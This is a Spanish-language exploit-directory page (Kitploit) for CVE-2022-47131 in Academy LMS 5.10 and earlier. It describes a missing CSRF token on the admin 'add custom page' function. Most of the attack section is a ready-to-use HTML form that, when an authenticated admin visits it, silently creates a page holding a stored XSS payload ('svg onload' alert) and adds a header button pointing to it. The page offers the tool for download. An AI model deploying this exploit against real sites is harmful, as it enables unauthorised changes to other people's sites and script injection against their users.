Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-47131 — Academy LMS <= 5.10 CSRF / XSS | Kitploit
Herramientas/GitHubGitHub/openxp-research/cve-2022-47131
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubopenxp-research/cve-2022-47131

CVE-2022-47131

Academy LMS <= 5.10 CSRF / XSS

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-47131

Academy LMS <= 5.10 CSRF / XSS

Descripción

Academy LMS es una aplicación donde las personas pueden crear y promocionar cursos. La función de añadir una nueva página es vulnerable a CSRF, ya que no hay ningún token que impida este ataque. Además, esta página puede usarse para cargar un payload XSS almacenado.

Prueba de concepto (POC)

El primer paso de nuestra prueba de concepto es autenticarse en la plataforma con un usuario administrador.

Después, solo accede a la página que contiene el código para explotar la vulnerabilidad; verás que se añadirá un nuevo botón a la página de inicio del sitio web, que redirige a la página xss.

Código utilizado en el exploit:

root@kitploit:~
<html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://target.com/admin/custom_page/add" method="POST">
       <input type="hidden" name="page&#95;title" value="CSRF&#32;XSS" />
       <input type="hidden" name="page&#95;content" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;domain&#41;&#59;&gt ;" />
       <input type="hidden" name="files" value="" />
       <input type="hidden" name="button&#95;title" value="CSRF&#32;XSS" />
       <input type="hidden" name="button&#95;position" value="header" />
       <input type="hidden" name="page&#95;url" value="xss" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
Descargar herramienta